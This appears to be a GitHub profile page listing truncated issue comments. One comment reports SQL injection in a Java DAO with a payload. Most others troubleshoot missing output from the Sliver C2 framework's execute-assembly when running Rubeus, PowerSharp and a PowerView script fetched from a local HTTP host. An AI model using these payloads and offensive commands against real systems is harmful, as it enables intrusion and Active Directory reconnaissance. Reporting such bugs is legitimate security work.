Winslow

Results 12 comments of Winslow

In UserDAO.java, multiple parameters such as user, pass, etc. are vulnerable to SQL injection. PoC: Set value of parameter 'user' as **` ' --`**. In CustomerDAO.java, multiple parameters such...

A reference: https://github.com/sliverarmory/armory/issues/27#issuecomment-1376409950

The same result

```
sliver (STRAIGHT_WILLOW) > execute-assembly -i -M -E /opt/red/rubeus.exe hash /password:123
[*] Output:
```

Additional information: I cannot get any output from Sliver cli, however, the output can be displayed in the process, such as the powershell cli. I used a powershell download cradle...

@MrAle98 I am using the latest version, and manually modified a few files to include the powershell command

```
All hackers gain exalted
[*] Server v1.5.33 - 79ff35429dd48d361a13c447342966292210ab4f - Dirty
[*]...
```

I tried with the latest binary release, and it does not have the issue. Thanks for your suggestion. @MrAle98 @rkervella

@MrAle98 I made modifications based on the comparison

Okay, I find there is an inconsistency between sessions. I am using the official latest version. The SYSTEM session has output, while other users' sessions (including local admin) do not have....

@rkervella @moloch-- Hope you are doing well! Here is an update: I compiled the latest source code without any modification, and the issue still exists. The following session is obtained...

> Try
>
> ```
> execute-assembly powersharp.exe -- "/m:http://192.168.0.44:81/powerview.ps1" "/c:get-netcomputer -identity web01"
> ```
>
> Same results?

Thanks for your quick response! Yes, still the issue

```
[server]...
```